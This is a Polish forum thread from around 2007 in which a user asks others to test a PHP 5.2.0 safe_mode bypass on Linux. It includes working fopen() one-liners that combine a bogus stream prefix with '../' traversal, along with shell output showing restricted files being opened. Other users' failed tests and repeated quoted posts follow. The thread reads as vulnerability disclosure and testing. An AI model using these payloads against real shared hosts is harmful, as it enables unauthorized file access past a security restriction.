Witam.
Poszukuje kogos kto posiada wersje php520 na sysemie linux, windows. Sam posiadam BSD i chcialbym cos sprawdzic. A dokladnie opcje safe_mode poniewaz posiadam pewien konfikt z tworcami php odnosnie bezpieczenstwa..
Chce tylko sprawdzic odpornosc safe_mode w wersji PHP520 i tylko w tej.
Pozdrawiam.
Pełna wersja: poszukuje PHP520
A ciężko Ci samemu zainstalować ? uhh
Mam php520! Ale uzywam BSD. Poszukuje kogos kto ma PHP5.2.0 i Linuxa lub windowsa z safe_mode.
To zainstaluj sobie Linuxa 
Dzieki za super rade. Ale nie mam ochoty instalowac linuxa bo mam BSD na dysku? :]
Taki cudowny ten BSD ze tylko jeden system mozesz miec na dysku ? ROTFL 
BSD to nie linux i nie windows. Zadowala mnie w 100%. Kwestia gustow.
Probowalem wszystkiego i dlamnie BSD jest najoptymalniejsze. Dla ciebie moze to byc windows. Nie interesuje mnie to co lubisz. A linuxa instalowac nie bede bo nie mam czasu ani ochoty ani potrzeby. Dlatego sie pytam kto ma linuxa. Proste?
Probowalem wszystkiego i dlamnie BSD jest najoptymalniejsze. Dla ciebie moze to byc windows. Nie interesuje mnie to co lubisz. A linuxa instalowac nie bede bo nie mam czasu ani ochoty ani potrzeby. Dlatego sie pytam kto ma linuxa. Proste?
Powiedzmy że ja mam. Jakbyś napisał o co chodzi - byłoby szybciej.
Ah wiec dokladnie chodzi o takie cos....
cxib# uname -a
FreeBSD cxib.laptop 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 08:43:30
UTC 2007 root@portnoy.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP amd64
cxib# php -v
php 5.2.0 (cli) (built: Jan 19 2007 21:19:36) (DEBUG)
Copyright © 1997-2006 The php Group
Zend Engine v2.2.0, Copyright © 1998-2006 Zend Technologies
cxib# su cxib
%whoami
cxib
%ls -la /dir/text.txt
-rwxrw-rw- 1 root wheel 0 Jan 21 00:53 /dir/text.txt
%pwd
/usr/home/cxib
%php -d
safe_mode=1 -r 'var_dump(fopen("srpath://///../../../../../../../../dir/text.txt", a));'
resource(5) of type (stream)
Dzieki adresowi srpath://///../../../../../../../../dir/text.txt mozna ominac safe_mode... Testowalem to pod wersja PHP520 i tylko podniad jest to osiagalne. Interesuje mnie to czy pod Linuxem bedzie to wspolpracowalo.
Dokladne informacje mozna znalesc pod adresem.
http://cxib.net/info/writing_mode.adv
cxib# uname -a
FreeBSD cxib.laptop 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 08:43:30
UTC 2007 root@portnoy.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP amd64
cxib# php -v
php 5.2.0 (cli) (built: Jan 19 2007 21:19:36) (DEBUG)
Copyright © 1997-2006 The php Group
Zend Engine v2.2.0, Copyright © 1998-2006 Zend Technologies
cxib# su cxib
%whoami
cxib
%ls -la /dir/text.txt
-rwxrw-rw- 1 root wheel 0 Jan 21 00:53 /dir/text.txt
%pwd
/usr/home/cxib
%php -d
safe_mode=1 -r 'var_dump(fopen("srpath://///../../../../../../../../dir/text.txt", a));'
resource(5) of type (stream)
Dzieki adresowi srpath://///../../../../../../../../dir/text.txt mozna ominac safe_mode... Testowalem to pod wersja PHP520 i tylko podniad jest to osiagalne. Interesuje mnie to czy pod Linuxem bedzie to wspolpracowalo.
Dokladne informacje mozna znalesc pod adresem.
http://cxib.net/info/writing_mode.adv
niestety pingwin nie wspolpracuje
Cytat
Warning: fopen(srpath://///../../../../../../../../a.txt): failed to open stream: Permission denied in Command line code on line 1
bool(false)
bool(false)
ale proboj zapisac tam gdzie masz prawa zapisu... czyli 777 no i katalog nie nalezy do ciebie...
czyli
mkdir /dir
chmod 777 /dir
chown jakisuser:grupa /dir
wnioskuje z tego ze blad dziala... bo dla przykladu
%ls -la / |grep ..
total 1027
drwxr-xr-x 23 root wheel 1024 Jan 24 19:49 .
drwxr-xr-x 23 root wheel 1024 Jan 24 19:49 ..
%php -d safe_mode=1 -r 'var_dump(fopen("/tesssxt.txt", a));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1001 is not allowed to access / owned by uid 0 in Command line code on line 1
Warning: fopen(/tesssxt.txt): failed to open stream: Invalid argument in Command line code on line 1
bool(false)
%php -d safe_mode=1 -r 'var_dump(fopen("x://../../../../tesssxt.txt", a));'
Warning: fopen(x://../../../../tesssxt.txt): failed to open stream: Permission denied in Command line code on line 1
bool(false)
czyli
mkdir /dir
chmod 777 /dir
chown jakisuser:grupa /dir
wnioskuje z tego ze blad dziala... bo dla przykladu
%ls -la / |grep ..
total 1027
drwxr-xr-x 23 root wheel 1024 Jan 24 19:49 .
drwxr-xr-x 23 root wheel 1024 Jan 24 19:49 ..
%php -d safe_mode=1 -r 'var_dump(fopen("/tesssxt.txt", a));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1001 is not allowed to access / owned by uid 0 in Command line code on line 1
Warning: fopen(/tesssxt.txt): failed to open stream: Invalid argument in Command line code on line 1
bool(false)
%php -d safe_mode=1 -r 'var_dump(fopen("x://../../../../tesssxt.txt", a));'
Warning: fopen(x://../../../../tesssxt.txt): failed to open stream: Permission denied in Command line code on line 1
bool(false)
still nothing
Jak błąd może działać ?
Pozatym chyba jest ok, że safe mode nie pozwala na takie zagrywki.,
Cytat
Warning: fopen(srpath://///../../../../../../../../tmp/a.txt): failed to open stream: Permission denied in Command line code on line 1
bool(false)
bool(false)
Cytat
Warning: fopen(srpath://///../../../../../../../../test/a.txt): failed to open stream: Permission denied in Command line code on line 1
bool(false)
bool(false)
Jak błąd może działać ?
Pozatym chyba jest ok, że safe mode nie pozwala na takie zagrywki.,
a mozesz utworzyc katalog z prawami 777 i probowac tam zapisas?
bo z tego co widze safe_mode jest omijane ale jest problem z zapisem.. bo na dobra sprawe powinno wywalic SAFE_MODE RESTRICTED przy
php -d safe_mode=1 -r 'var_dump(fopen("/tmp/tesssxt.txt", a));'
bo z tego co widze safe_mode jest omijane ale jest problem z zapisem.. bo na dobra sprawe powinno wywalic SAFE_MODE RESTRICTED przy
php -d safe_mode=1 -r 'var_dump(fopen("/tmp/tesssxt.txt", a));'
no i wywala
Cytat
owner@hellfire:/home$ php -d safe_mode=1 -r 'var_dump(fopen("/tmp/a.txt", "a"));'
php Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1005 is not allowed to access /tmp/a.txt owned by uid 0 in Command line code on line 1
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1005 is not allowed to access /tmp/a.txt owned by uid 0 in Command line code on line 1
php Warning: fopen(/tmp/a.txt): failed to open stream: No such file or directory in Command line code on line 1
Warning: fopen(/tmp/a.txt): failed to open stream: No such file or directory in Command line code on line 1
bool(false)
php Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1005 is not allowed to access /tmp/a.txt owned by uid 0 in Command line code on line 1
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1005 is not allowed to access /tmp/a.txt owned by uid 0 in Command line code on line 1
php Warning: fopen(/tmp/a.txt): failed to open stream: No such file or directory in Command line code on line 1
Warning: fopen(/tmp/a.txt): failed to open stream: No such file or directory in Command line code on line 1
bool(false)
czyli safe_mode jest omijane w wersji PHP520. Umnie nawet plik zostaje zapisany. Musisz probowac tam gdzie masz konkretne prawa zapisu. Boje sie ze katalog /tmp jest na tyle specyficzny ze moga wystapic tu problemy.
ja cie chyba wyraznie nie rozumiem, u ciebie blad jest faktycznie bo dostajesz
pomimo safe mode. u mnie natomiast :
wiec chyba jest w porzadku
Cytat
resource(5) of type (stream)
pomimo safe mode. u mnie natomiast :
Cytat
php Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1005 is not allowed to access /tmp/a.txt owned by uid 0 in Command line code on line 1
wiec chyba jest w porzadku
no nie rozumiesz mnie... patrz jak dam /tmp/cos.cos
%php -d safe_mode=1 -r 'var_dump(fopen("/tmp/cos.cos", a));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1001 is not allowed to access /tmp owned by uid 0 in Command line code on line 1
Warning: fopen(/tmp/cos.cos): failed to open stream: Invalid argument in Command line code on line 1
bool(false)
%php -d safe_mode=1 -r 'var_dump(fopen("x://../../../../tmp/cos.cos", a));'
resource(5) of type (stream)
%
U ciebie wywala Permission denied jakbys nie mial tam praw zapisu. A jakie prawa ma katalog /tmp u ciebie? Probowales zapisac do pliku z uprawnieniami 777 lub katalogu z 777?
lub wez sproboj otworzyc /dev/null bo tam na bank sa prawa zapisu.
Umnie to wyglada tak:
%php -d safe_mode=1 -r 'var_dump(fopen("/dev/null", a));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1001 is not allowed to access /dev/null owned by uid 0 in Command line code on line 1
Warning: fopen(/dev/null): failed to open stream: Invalid argument in Command line code on line 1
bool(false)
%php -d safe_mode=1 -r 'var_dump(fopen("x://../../../../dev/null", a));'
resource(5) of type (stream)
%php -d safe_mode=1 -r 'var_dump(fopen("/tmp/cos.cos", a));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1001 is not allowed to access /tmp owned by uid 0 in Command line code on line 1
Warning: fopen(/tmp/cos.cos): failed to open stream: Invalid argument in Command line code on line 1
bool(false)
%php -d safe_mode=1 -r 'var_dump(fopen("x://../../../../tmp/cos.cos", a));'
resource(5) of type (stream)
%
U ciebie wywala Permission denied jakbys nie mial tam praw zapisu. A jakie prawa ma katalog /tmp u ciebie? Probowales zapisac do pliku z uprawnieniami 777 lub katalogu z 777?
lub wez sproboj otworzyc /dev/null bo tam na bank sa prawa zapisu.
Umnie to wyglada tak:
%php -d safe_mode=1 -r 'var_dump(fopen("/dev/null", a));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1001 is not allowed to access /dev/null owned by uid 0 in Command line code on line 1
Warning: fopen(/dev/null): failed to open stream: Invalid argument in Command line code on line 1
bool(false)
%php -d safe_mode=1 -r 'var_dump(fopen("x://../../../../dev/null", a));'
resource(5) of type (stream)
Kod
tomek@shadow:/root$ /usr/local/php5.2/bin/php -d safe_mode=1 -r 'var_dump(fopen("/dev/null", "a"));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1000 is not allowed to access /dev/null owned by uid 0 in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
Warning: fopen(/dev/null): failed to open stream: No such file or directory in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
bool(false)
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1000 is not allowed to access /dev/null owned by uid 0 in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
Warning: fopen(/dev/null): failed to open stream: No such file or directory in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
bool(false)
Kod
tomek@shadow:/root$ /usr/local/php5.2/bin/php -d safe_mode=1 -r 'var_dump(fopen("/../../../../dev/null", "a"));'
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1000 is not allowed to access /../../../../dev/null owned by uid 0 in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
Warning: fopen(/../../../../dev/null): failed to open stream: No such file or directory in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
bool(false)
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1000 is not allowed to access /../../../../dev/null owned by uid 0 in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
Warning: fopen(/../../../../dev/null): failed to open stream: No such file or directory in Command line code on line 1
Call Stack:
0.0002 262144 1. {main}() Command line code:0
0.0003 262144 2. fopen() Command line code:1
bool(false)
O to moze ci chodziło ?
Kod
php 5.2.1RC3-dev (cli) (built: Jan 9 2007 10:15:45)
Copyright (c) 1997-2007 The php Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Xdebug v2.0.0RC1, Copyright (c) 2002, 2003, 2004, 2005, 2006, by Derick Rethans
Copyright (c) 1997-2007 The php Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Xdebug v2.0.0RC1, Copyright (c) 2002, 2003, 2004, 2005, 2006, by Derick Rethans
uzywasz wersji 5.2.1RC a z tego co mi wiadomo blad tam nie funkcjonuje. Pozatym trzeba dodac jakis prefix np xxxxx://../../../../../dev/null a nie same ../../../../dev/null bo wtedy ./../../../../ jest skracane przez realpath. chodzi tu o prefix
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.